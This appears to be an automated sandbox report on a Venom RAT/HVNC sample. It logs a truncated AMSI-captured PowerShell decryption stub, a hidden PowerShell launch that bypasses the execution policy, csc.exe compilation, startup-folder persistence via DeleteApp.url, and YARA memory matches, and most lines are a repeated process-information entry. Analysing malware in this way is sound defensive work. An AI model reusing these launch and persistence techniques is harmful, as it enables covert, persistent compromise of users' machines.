            Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: 4.pdb9 source: powershell.exe, 00000004.00000002.1883771714.00000277C5549000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($fn9R) $I1ow = [Convert]::FromBase64String($hNDv) $kHPc = [Convert]::FromBase64String($ojAz) $a8XQ = [System.Security.Cryptography.Aes]::Create() $a8XQ.Key = $s6CA $a8X
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.cmdline"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B9723FE push 8B485F92h; iretd 0_2_00007FFD9B972403
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8BFB5D push esp; retf 4_2_00007FFD9B8BFB5E
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B8167 push ebx; ret 4_2_00007FFD9B8B816A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8DB500 push ebx; retf 4_2_00007FFD9B8DB51A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_06AE5B50 push esp; iretd 8_2_06AE5BCD
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.dllJump to dropped file

            Boot Survival

            barindex
            Source: Yara matchFile source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7976, type: MEMORYSTR
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.urlJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.urlJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
